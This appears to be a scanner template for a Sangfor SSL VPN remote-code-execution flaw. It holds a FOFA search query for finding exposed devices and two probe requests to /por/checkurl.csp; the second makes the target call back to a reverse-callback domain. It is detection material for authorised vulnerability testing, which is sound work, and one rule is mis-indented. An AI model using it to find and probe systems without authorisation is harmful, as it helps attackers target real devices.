id: sangfor-sslvpn-rce

info:
  name: Sangfor SSLVPN RCE
  author: xpoc
  severity: critical
  verified: false
  description: |
    FOFA: app="SANGFOR-SSL-VPN"
  tags: sangfor,sslvpn,rce
  created: 2023/07/13

set:
  reverse: newReverse()
  reverseDomain: reverse.url.domain
rules:
  r0:
    request:
      method: GET
      path: /por/checkurl.csp
    expression: response.status == 200 && response.body.bcontains(b"2")
r1:
    request:
      method: GET
      path: /por/checkurl.csp?url=http://{{reverseDomain}}&retry=0&timeout=1
    expression: response.status == 200 && response.body.bcontains(b"0") && reverse.wait(5)
expression: r0() && r1()
